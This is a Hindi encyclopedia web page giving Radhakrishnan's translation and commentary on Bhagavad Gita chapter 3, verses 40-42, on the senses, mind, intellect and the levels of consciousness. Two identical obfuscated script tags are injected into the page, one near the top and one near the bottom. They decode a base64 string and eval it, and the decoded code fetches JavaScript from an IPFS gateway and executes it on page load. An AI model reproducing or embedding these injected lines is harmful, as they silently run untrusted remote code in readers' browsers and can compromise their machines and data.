भगवद्गीता -राधाकृष्णन पृ. 122

अद्‌भुत भारत की खोज
नेविगेशन पर जाएँ खोज पर जाएँ
गणराज्य इतिहास पर्यटन भूगोल विज्ञान कला साहित्य धर्म संस्कृति शब्दावली विश्वकोश भारतकोश

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

अध्याय-3
कर्मयोग या कार्य की पद्धति फिर काम किया ही किसलिए जाए

  
40.इन्द्रियाणि मनो बुद्धिरस्याधिरस्याधिष्ठानमुच्यते ।
एतैर्विमोहयत्येष ज्ञानमावृत्य देहिनम् ।।
इन्द्रियां, मन और बुद्धि इसका रहने का स्थान कही जाती है। इनके द्वारा ज्ञान को आवृत करके यह शरीरधारी (आत्मा) पथभ्रान्त कर देता है।
 
41. तस्मात्वमिन्द्रियाण्यादौ नियम्स भरतर्षभ।
पाप्मानं प्रजहि ह्येनं ज्ञानविज्ञाननाशनम्।।
इसलिए भरतों में श्रेष्ठ (अर्जुन), तू शुरु से ही इन्द्रियों को अपने नियन्त्रण में रख और ज्ञान और विवके के इस पापी विनाशक को मार डाल। यहां ज्ञान और विज्ञान शब्दों का अभिप्राय वेदान्त के ज्ञान और सांष्य के विस्त्रृत ज्ञान से है। शंकराचार्य ने ज्ञान की व्याख्या करते हुए इसे ’शास्त्रों और गुरुओं से प्राप्त आत्मा तथा अन्य वस्तुओं का ज्ञान’ और विज्ञान को ’इस प्रकार सीखी हुई वस्तुओं का व्यक्तिगत अनुभव’ बताया है। रामानुज की दृष्टि में ज्ञान का सम्बन्ध आत्म-स्वरूप या आत्मा कीर प्रकृति से है और विज्ञान का सम्बन्ध आत्मविवेक या आत्मा के विभेदात्मक ज्ञान से है। यहां पर दिए गए अनुवाद में ज्ञान को आध्यात्मिक ज्ञान और विज्ञान को तार्किक ज्ञान माना गया है।
श्रीधर ने इन दोनों व्याख्याओं का समर्थन किया है।[१]

42.इन्द्रियाणि पराण्याहुरिन्द्रियेभ्यः परं मनः ।
मनसस्तु परा बुद्धियों बुद्धेः परतस्तु सः ।।
कहा जाता है कि इन्द्रियां बड़ी हैं; मन इन्द्रियों से भी बड़ा है; बुद्धि मन से भी बड़ी है; परन्तु बुद्धि से भी बड़ा वह है। कठोपनिषद्: 3,10; साथ ही देखिए 6,7। चेतना को एक-एक सीढ़ी करके ऊपर उठाया जाना चाहिए। ज्यों-ज्यों हम ऊपर उठते जाते हैं, त्यों-त्यों हम अधिक स्वतन्त्र होते जाते हैं। यदि हम इन्द्रियों के प्रभाव में रहकर काम करत हैं, तो हम कम स्वतंत्र होते हैं। जब हम मन के आदेशों का पालन करते हैं, तब हम अपेक्षाकृत अधिक स्वतन्त्र होते हैं; पर जब मन बुद्धि के साथ संयुक्त हो जाता है, तब हम और अधिक स्वतन्त्र होते हैं; जब हमारे कार्य परे से आने वाले प्रकाश, आत्मा से आच्छाति बुद्धि द्वारा निर्धारित होते हैं, तब हमें उच्चतम कोटि की स्वतन्त्रता प्राप्त होती है। इस श्लोक में चेतना के स्तरों का सोपानक्रम दिया गया है।


« पीछे आगे »

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

टीका टिप्पणी और संदर्भ

  1. . ज्ञानमात्मविषयं, विज्ञानं शास्त्रीय ’’’ यद् वा ज्ञानं शास्त्राचार्योपदेशजं, विज्ञांन निदध्यासनजम्। अमरकोश से तुलना कीजिएः मोक्षे धीः ज्ञानमन्यत्र, विज्ञानं शिल्पशास्त्रयोः ।

संबंधित लेख

साँचा:भगवद्गीता -राधाकृष्णन